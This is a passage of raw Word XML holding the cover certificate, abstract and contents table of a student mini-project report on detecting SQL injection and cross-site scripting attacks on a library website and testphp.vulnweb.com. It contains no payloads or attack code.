        <w:widowControl w:val="0"/>
        <w:spacing w:before="148" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Certified that the mini-project work entitled </w:t>
      </w:r>
      <w:r w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00DD6777" w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Detection of SQL Injection attacks on Library website and Cross-site Scripting attacks on testphp.vulnweb.com</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is a bonafide work</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>carried out by</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="00DB2C10" w:rsidRDefault="00FC2AFC" w:rsidP="009A6244">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Gauri </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gulwane</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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t>BCOA41</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRDefault="00FC2AFC" w:rsidP="009A6244">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sampada</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gaonkar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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r>
      <w:r w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>BCOA43</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F20BF" w:rsidRDefault="009A6244" w:rsidP="009A6244">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Devashish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Dhande</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008F20BF" w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008F20BF" w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008F20BF" w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008F20BF" w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008F20BF" w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008F20BF" w:rsidRPr="00DB2C10">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BCOA46</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F20BF" w:rsidRDefault="008F20BF" w:rsidP="009A6244">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F20BF" w:rsidRPr="00DB2C10" w:rsidRDefault="008F20BF" w:rsidP="009A6244">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="009A6244">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1065"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="009A6244">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1065"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The report has been approved as it satisfies the academic requirements in respect of mini-project work prescribed for the course.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="009A6244">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="270"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="00FC2AFC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="270"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="00FC2AFC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="270"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="00FC2AFC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="270"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="00FC2AFC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="00FC2AFC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="00FC2AFC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="00FC2AFC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>……………...…………………………</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="00FC2AFC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                  Subject In-charge </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="00FC2AFC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="00FC2AFC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="00FC2AFC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A6244" w:rsidRDefault="009A6244" w:rsidP="00FC2AFC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="30"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009A6244" w:rsidRDefault="00FC2AFC" w:rsidP="00FC2AFC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="30"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Abstract</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="00EF1C2F" w:rsidRDefault="00FC2AFC" w:rsidP="009A6244">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="30"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00EF1C2F" w:rsidRPr="00EF1C2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL injection attack</w:t>
      </w:r>
      <w:r w:rsidR="00CB6376" w:rsidRPr="00EF1C2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> is among the most common security threats to web-based services that are deployed on cloud. By exploiting web software vulnerabilities, SQL injection attackers can run arbitrary malicious code on target databases to acquire or compromise sensitive data.</w:t>
      </w:r>
      <w:r w:rsidR="00EF1C2F" w:rsidRPr="00EF1C2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF1C2F" w:rsidRPr="00EF1C2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. </w:t>
      </w:r>
      <w:r w:rsidR="00CB6376" w:rsidRPr="00EF1C2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> In this report, we’ll detect the SQL I</w:t>
      </w:r>
      <w:r w:rsidR="00216DA3" w:rsidRPr="00EF1C2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>njection attacks and XSS attacks.</w:t>
      </w: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rsidP="00FC2AFC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="30"/>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lastRenderedPageBreak/>
        <w:t>Content</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8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3351"/>
        <w:gridCol w:w="2587"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F754EB" w:rsidRPr="009F6965" w:rsidTr="00F168C7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968"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Sr. No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3351"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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2587"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Page No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F754EB" w:rsidRPr="009F6965" w:rsidTr="00F168C7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3351"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Introduction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2587" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00AA76DA"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F754EB" w:rsidRPr="009F6965" w:rsidTr="00F168C7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3351"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Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2587" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00AA76DA"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F754EB" w:rsidRPr="009F6965" w:rsidTr="00F168C7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3351"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Result and Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2587" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00FC2AFC"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F754EB" w:rsidRPr="009F6965" w:rsidTr="00F168C7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3351" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="00EE2F3C">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 xml:space="preserve">Conclusions </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2587" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00FC2AFC"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FC2AFC" w:rsidRPr="009F6965" w:rsidTr="00F168C7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3351" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC"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References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2587" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00FC2AFC"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bl>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996A06" w:rsidRPr="009F6965" w:rsidRDefault="00996A06" w:rsidP="00996A06">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="30"/>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List of Figure</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
